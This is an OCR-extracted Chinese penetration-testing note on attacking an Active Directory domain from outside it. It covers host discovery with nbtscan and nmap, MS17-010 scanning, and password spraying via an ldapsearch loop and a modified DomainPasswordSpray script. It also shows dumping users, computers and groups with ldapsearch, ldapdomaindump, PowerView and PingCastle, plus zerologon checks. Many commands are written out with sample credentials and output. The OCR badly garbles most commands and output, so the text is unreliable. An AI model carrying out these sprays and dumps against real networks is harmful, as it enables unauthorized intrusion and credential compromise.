2024域外渗透域内思路.docx

域外渗透域内方法目前我知道的方法,通过nbtscan去看那些机器是域机器，Idap定位域控,还有扫描那些机器开启了kerberos然后针对加入域内的机器去针对性的打，还有针对域控利用AS-REQ阶段去枚举用户名和密码，想问问还有其他思路么扫描探测IdaPIdaP定位域控1nm叩-T3-sV-n-sT-p389,636,3268,3269-v-open192.168.159.0/24nbtscan1nbt.exe172.16.0.0/162nbt.exe172.16.172.0/24C:MJsersAdministratorDesktop>nbt.e×e172.16.0.0/16172.16.0.19Workgroupwin-gdiAGlQNUi2SHARING172.16.0.36172.16.0.39WorkgrouPsERUER2003UORKGROPWIN-0F7SFlPUGB3SHARING172.16.0.44Workgroup<芍pbcpnSHARING172.16.0.58'RKGROIIP.BiSHARING172.16.0.121beSHARING172.16.0.122SHARING172.16.0.127CHISHARINGDC172.16.0.153WORhswa11-866ARIGK4PUSHARING172.16.0.170WorkgroupwiNDoWS-x1Q2N2HSHARING172.16.0.221172.16.0.222Uorkgroupwindows-obubbsaworkgropwin-lr8nq6u7gqSHARING172.16.0.235Workgroupwin-hae4pcgi1.2JSHARINGrc|C：Use*sSAdministratorDesktop>nbt.e×e172.16.172.0/24172.16.172.9UorkgrouPw1n-8ps8fucos00SHARING172.16.172.13Workgroupxchemical-SqlrouSHARING172.16.172.15WorkgroupschemiCfi1.-REPORTSHARING1cping40.exescanosver192.168.7.1192.168.7.2552cping35.exescansmbvul192.168.7.1192.168.7.255msl7010IP172.16. 0.58172.16.0.25172.16.0.39172.16.0.26172.16.0.30172.16.0.90172.16.0.20172.16. 0.121172.16.0.27172.16.0.28172.16.0.22172.16. 0.24172.16.0.23172.16.0.21172.16.0.29172.16.0.19172.16.0.170172.16.0.34172.16.0.120172.16.0.44172.16. 0.2331721673RIACHe、12-34-56-78-9-BCYl12-34七6-78-9A-BCWIh-u1.AH01.04O12-34-56-78-9A-BCWIN-OF7SF1PUGB312-34-56-78-9A-BCWIN-C3Q0EFBR2II12-34-56-78-9A-BCWIN-T9三V72TDRK912-34-56-78-9A-BCdjgl12-34-56-78-9A-B-FPUN2KV5K12-34-56-78-9A-Bk-DC-02.12-34-56-78-9A-BCW.一P5HSIMJ12-34-56-78-9A-BCWIN-O1.VlJPPREQQ12-34-56-78-9A-BCWlN-DGEo866A5OJ12-34-56-78-9A-BCWIN-R61NUIQDENK12-34-56-78-9A-BCWIN4J0CJI1DA3FE12-34-56-78-9A-BCWIN-OI494ORABDI12-34-56-78-9A-BCWlN-K440807GJOB12-34-56-78-9A-BCWINYDlAGIQNU1212-34-56-78-9A-BCWINDOWS-X1Q2N2H12-34-56-78-9-BCWTN-Ri3RQTTUOim12-34-56-78-9A-E.Yc-OJ12-34-56-78-9A-K.CSOPBC.12-34-56-78-9A-BCWIN-73DVRBGBOA917-34-EA-7R-<iA-RCWTN-MAE4PCGTI7TOSverWin(R)2008Enterprise6001SP1Win2016Standard143931Win2016Standard14393(Win2016Standard14393Win2016Standard14393Win2008R2Enterprise7601SP1r«?n2。，',4393Win2012R2Standard9600“standard14393Win2016Standard14393Xin2016Standard14393Win2016Standard14393Win2016Standard14393Win2016Standard14393Win2016Standard14393Win2008R2Standard7601SP1Win2008R2Enterprise7600e：YSe7601SP1Win2012R2Standard9600<.V*XVMt*4393(Win2008R2Enterprise7601SP1Win7RR7FntmricP7fi1SP11Idapscan11.adon.exe172.16.0.0/24Idapscan问题，可能会存在多个389端口，通过对比上面的信portscan11.adon.exe172.16.0.0/24PortScan配置端口port.txt2port.txt387-894388-390域外暴力破解域用户口令的方法IinUX下循环实现暴力破解，完整的bash命令如下:1foriin$(cattest.txt);doecho-e"n$i"Idapsearch-×-HIdap:/192.168.test.txt保存所有用户名，如果口令正确，输出查询结果的个数，如果口令错误，返回验证错误：ldap_bind:Invalidcredentials(49)输出结果如下图:#foriin$(cattest.txt);doecho-e-niJldapsearch-x-H1dap:/192.168.1.1:389-DBCN«e$ie,CN三Users,DC三test,DC三com-wDomainUserl23!-b'DC*test,DC三comgrep'#numEntriea;doneIllllIdaP_bind:Invalidcredentials(49)additionalinfo:80090308：1.dapErr:DSID-0C0903C5fcomment:AcceptsGcurityContexterror,data52etv25822222IdaP_bind:Invalidcredentials(49)additionalinfo:80090308：1.dapErr:DSID-0C93C5,comment:AcceptsecurityContexterror,data52e,v25833333ldap.bind:Invalidcredentials(49)additionalinfo:80090308：1.dapErr:DSID-0C0903C5,comment:AcceptsGcurityContexterror,data52etv258044444ldap-bind:Invalidcredentials(49)additionalinfo:80090308：1.dapErr:DSID-0C093C5rcomment:AcceptsGcurityContexterror,data52etv25855555ldap_bind:Invalidcredentials(4Q>additionalinfoR<*C308:1.dapErr:DSID-0C093C5,comment:AcceptsecurityContexterrc*,uata52etv258testb#numEntries:281HWindOWS下WindOWS系统通过InVOke-DOmainPaSSWOrdSPrayOUtSideTheDOmain暴力破解域用户口令DOmainPaSSWOrdSPray的功能比较完整，但不支持域外的使用，所以我在DOmainPaSSWOrdSPray的基础上做了一些修改，使其支持域外的使用具体修改的位置如下：原版中修改1.DAP查询的语句:1JDomainContext=New-ObjectSystem.DirectoryServices.ActiveDirectory.Directo2$DOnlaine)bject=System.DirectoryServices.ActiveDirectory.Domain:GetDomain3$CUrrentDomain="1.DAP:/"+(ADSI"1.DAP:/$Domain").ClistinguishedName替换为1.DAP的直询语句,示例：192.168.1.lDC=test,DOconT最络的完整查询语句为：1.DAP192.168.1.lDC=test,DC=com由于是在域外进行暴力破解，无法获得域用户的口令策略，所以我移除了DOmainPaSSWOrdSPray中获得口令策略的功能我已经将修改后的代码上传至github,地址如下：DomainpasswordSprayOutsideTheDomain.ps1域外使用的示例命令如下：1Invoke-DomainpasswordSprayOutsideTheDomain-Domain"192.168.1.lDC=testjDC=cPSC:test>import-InodIlle.Inoke-DonainPasSwordSprayOutsIdeTheDonain.psiPSC:test>Inuoke-Do11ainPassuordSpra,OutsideTeDo11ain-Domain,192.168.1.lDC=test,DC=com"-User1.ist.user.txt-PasswordDo11ainUserl23?-UerboseI1.DAP:/192.168.1.lDC=test,DC=con*Using.user.txtasuserlisttospraywith*Warning：UserswillnotbecheckedforlockoutthreshoId.ConfirmPasswordSprayAreSFOUsureyouwanttoperformapasswordspayagainst5accounts?VVesNNo?HelpCdefaultis,V,>:*PasswordSPNayinghasbegunwith1passwords*Thisnighttakeawhiledependingonthetotalnumberofusers*NowtryingPaSSWOXdDonainUserl23?against5users.Currenttineis2：14PM*Writingsuccessesto*SUCCESS?User三testaPassword：Domai11Userl23!*SUCCESS?UserztestbPassword：DomainUsepl23?*PasswordSPrayingiscompleteIPS获取到凭证后域外获取活动目录信息的方法域控制器默认会开启端口389,用作1.DAP服务httDs/3student.ithub.io%E6%B8%97%E9%80%8F%E5%9F%BA%E7%A1%80%E6%B4%BB%E5%8A%A8%E7%9B%AE%E5%BD%95%E4%BF%A1%E6%81%AF%E7%9A%84%E8%8E%B7%E5%8F%96Kali系统通过IdaPSearCh进行数据查询测试环境如下图前提：我们能够访问到域控制器(DC)的389端口,并且我们至少已经获得了域内f普通用户的口令这个测试环境中，我们获得了域内普通用户testa的口令为DOmainUSerI23!连接命令如下：1Idapsearch-X-HIdap:/192.168.1.1:389-D"CN=testajCN=UsersjDC=testjDC=com1参数说明：23 -X进行简单认证4 -H服务器地址5 -D用来绑定服务器的DN6 -W绑定DN的密码7 -b指定要查询的根节点89这条命令会显示所能查询到的所有信息，如下图查询所有域用户1加入搜索条件：,"(objectClass=user)(ObjectCategory=Person)"1Idapsearch-x-HIdap:/192.168.1.1:389-D"CN=testa,CN=UsersjDC=test,DC=com这条命令会输出所有域用户的所有属性，如下图msExchMDtmfMap:firstName1.astName:432584624526922538392312243159234044314233384msExchVersion:1130555651391488msE×chRBACPolicy1.ink:CN>DefaultRoleAssignmentPolicyrCN>PolicieslCN>RBAC,CN三FirstOrganizationtCN三MicrosoftExchange,CN三Services,CNConfiguration,DC三test,DC=commsExchArchiveGUID:1.XffiSHUtGGUCP4kw03+Dulw=msExchArchiveStatus:1InsExchMDBRulesQuota:64InsExchMailboxAuditEnable:FA1.SEmsExchTransportRecipientSettingsRags:msE×chUserAccountControl:0msExchAddressBookRags:1msExchRecipientSoftDeletedStatus:0msExchMobileMailboxRags:1InternetEncoding:0# searchreferenceref:ldap:/ForestDnsZDC=ForestDnsZones,DC=testlDC=com# searchreferenceref:Idap:/DomainDnsZones.test.Com/DC=DomainDnsZones,DC=test,DC=com# searchreferenceref:ldap:/CN三Configuration,DC三test,DC=Com# searchresultsearch:2result:0Success# numResponses:22# numEntries:18# numReferences:3为了便于统计名称，可以选择只列出CN(COmmonName)f并且使用grep命令对输出进行过滤命令如下：1Idapsearch-x-HIdap:/192.168.1.1:389-D"CN=testajCN=UsersjDC=testjDC=com查询所有计算机加入搜索条件："(&(ObjeCtCategOry=COnIPUter)(ObjeCtCIaSS=COmPUter)命令如下：1Id叩SearCh-x-HIdap:/192.168.1.1:389-D',CN=testa,CN=UsersjDC=test,DC=com查询所有组加入搜索条件：”(&(ObjeCtCategory=group)”命令如下：1Idapsearch-×-HIdap:/192.168.1.1:389-D"CN=testa,CN=UsersjDC=test,DC=com接着，开始带账密此处只需一个普通用户账密即可远程dump域内数据，实际中亦可把IdaPdOmaindUmP挂至Usocks下使用，dump的速度跟数据量有直接关系#pip2.7installIdapdomaindump#Idapdomaindump192.168.159.149-u,motoomajun,-p'mjl23!#45'-atNT1.M2.Windows系统通过POWerVieW进行数据查询前提：我们能够访问到域控制器(De)的389端口，并且我们至少已经获得了域内一个普通用户的口令这个测试环境中，我们获得了域内普通用户testa的口令为DOmainUSerI23!PowerView的地址:https:/github.COnPowerShe1IMafia/PowerSpIOit/b1ob/masterReCOn/PowerView.PS查询所有域用户这里需要使用凭据信息，所以完整的命令如下:1工mport-Module.PowerView.ps!1$uname="testa"2$PWd=COnVertTo-SeCUreString,DomainUserl23!,-AsPlainText-Force3$cPed=New-ObjectSystem.Management.Automation.PSCredential($uname,$PWd)4Get-NetUser-D-DomainController192.168.1.1-ADSpath"1.DAP:/1Get-NetUser-D-DomainController172.16.172.80-ADSpath为了便于统计名称，可以选择只列出name项，完整命令如下:1$iJname="testa”2$pwd=ConvertTo-SecureString"DomainUserl23!"-AsPlainText-Force3$cPed=New-ObjectSystem.Management.Automation.PSCredential($uname,$PWd)4Get-NetUser-D-DomainController192.168.1.1-ADSpath"1.DAP:/PSC:test>Get-NetUser-Domaintest.con-DonainControHer192.168.1.1-ADSpathF1.DAP：/DC=test,DC=com"-Credential$credF1namename：Administratorname：Guestname：krbtgtname：testlname：test2name：testaname：testbname：exchangeuseriname：ExchangeOnline-ApplicationAccountname：Syste11Mailbo×<lf05a927-lf01-46d7-80ff-007455b96824>name：SystenMailbo×<bb558c35-97fl-4cb9-8ff7-d53741dc928c>name：SystenMailbo×<e0dclc29-89c3-4034-b678-e6c29d823ed9>name：DiscouerirSearchMailbox<D919BA05-46A6-415f-80AD-7E09334BB852>name：Migration.8F3e7716-2011-43e4-96bl-aba62d229136name：FederatedEnail.4clf4d8b-8179-4148-93bf-00a95fale042name：HealthMailbo×e822fbac72084940803a35e251188c0bnane：HealthMailbo×bd63ca8052dl46bl92ce9b50ec6f6a9enane：HealtMailbo×ad21f9e862eb4a90a3d28efdbea71641查询所有计算机1$uname="testa"2$PWd=COnVertTO-SecUreString"DomainUserl23!"-AsPlainText-Force3$cred=New-ObjectSystem.Management.Automation.PSCredential($uname,$pwd)4Get-NetComputer-D-DomainController192.168.1.1-ADSpath"1.DA查询所有组1$iIname="testa2$PWd=COnVertTo-SecureString"DomainUserl23!"-AsPlainText-Force$cred=New-ObjectSystem.Management.Automation.PSCredential($uname,$pwd)4Get-NetGroup-D-DomainController192.168.1.1-ADSpath"1.DAP:/PingCastIehttps:i搜集域控列表包括各个域控机器自身的详细信息2搜集域管列表包括各个域管用户的活跃记录，锁定状态等3搜集域内组列表4自动检查域间信任关系5 检查容易受kerberoast攻击的域管账户6 检查是否安装有laps7检查域内用户密码策略8 口检查AdminSDHolder后门9口检查金票后门10 口检查GPO后门11 口检查WFF12 口检查域内登录脚本13 检查委派14 口检查容易受攻击的老版本系统15 口检查容易受AS-REPRoasting攻击的账户16 域功能级别17 口僵尸账户识别18 密码长期有效的用户19 口域内所用操作系统版本大致画像20 zerologon漏洞探测日常域外搜集基本就一句话，其余的都用不上，因为都已经概括进去了，实际中亦可直接把工具挂到SOCkS下操作一句话域内搜集1PingCastle.exe-server192.168.159.149-usermotoomajun-passwordmjl23!2此处的域用户登录记录获取的并不太全PingCastle.exe-server192.168.159.149-usermotoomajun-passwordmjl23!1更多该命令参数：2-healthcheck：执行安全检查（步骤1）-api-endpoint：通过调用api上传报告，例如：http:/server-api-keykey:使用已注册的api密钥-explore-trust：在运行安全检查之后，在目录林的域上，对除目录林和目录林信任域之-explore-forest-trust：在森林的根域上，运行状况检查之后，对发现的所有森林信任explore-trust和explore-forest-trust可起运彳亍-explore-exceptiondomains:逗号分隔的不会自动探索的域的值-encrypt：使用存储在.config文件中的RSA密钥对Xml报告的内容进行加密-level级别：指定在Xml文件中找到的数据量例如：-levelFull,Normal,1.igh11-no-enum-limit：删除HTM1.报告中最多100个用户的限制12-reachable：将可访问域添加到发现的域列表中-SendXmlTo电子邮件：将Xml报告发送到邮箱（以逗号分隔的电子邮件）-SendHtmlTo电子邮件：将html报告发送到邮箱15-SendAllTo电子邮件：将html报告发送到邮箱16-notifyMail电子邮件：在收到邮件时添加电子邮件通知-Smtplogin用户：允许SmtP凭据.-smtppasspass:在命令行中输入-smtptls：如果在465和587以外的其他端口上使用，则在SMTP中启用T1.S/SS1.20-skip-null-session：不测试空会话-webdirectorydir:将XmI报告上传到WebdaV服务器-webuser用户：可选的用户名和密码-webpassword密码2425-I-swear-I-paid-win7-support:毫无意义-scanner1警告：同时检查多个工作站可能会引发安全警报。2aclcheck检查域内的AC1.34antivirus检查域内未安装已知防病毒软件的计算机，它用于检测不受保护的计56export_user导出AD域内所有用户及其创建日期，上次登录和上次密码更改。789foreignusers使用信任机制枚举位于其他域中的用户，例如距离太远的域1011laps_bitlocker1213Iocaladmin1415nullsession1617nullsession-trust1819Oxidbindings检查是否为域中的所有计算机启用1.APS（本地管理员密码解决枚举计算机的本地管理员检查是否启用了空会话并提供示例。检查可以通过空会话进行通信的域信任列表2021remote2223share2425smb26通过OXidResolver（DeOM的一部分）列出计算机的所有工PC无检查计算机上是否安装了远程桌面解决方案列出计算机上的共享列表，并显示不同的共享是否可以由所有人访问扫描计算机可用的Smb版本并显示Srnb协议是否启动27smb3querynetwork使用SMB3协议列出计算机所对应的和接口速度。需要身份验28spooler检查域内各个主机上是否开放了打印机服务2930startup获取计算机的上次启动日期。可用于确定是否已应用最新补丁3132zerologon检验是否存在Zero1.ogon漏洞。注意：必须在域内测试。域信任zerologon漏洞探测，注，此操作需要在目标域内机器上进行1PingCastle.exe-server192.168.159.149-scannerzerologon-scmode-dc目标系统无met3.5环境，可尝试直接在cmd命令行下在线安装1DISM/Online/Enable-Feature/FeatureName:NetFx3/AllApacheDirectoryStudio直接用域账号连上去即可（实际中亦可直接挂在socks下操作），非常完善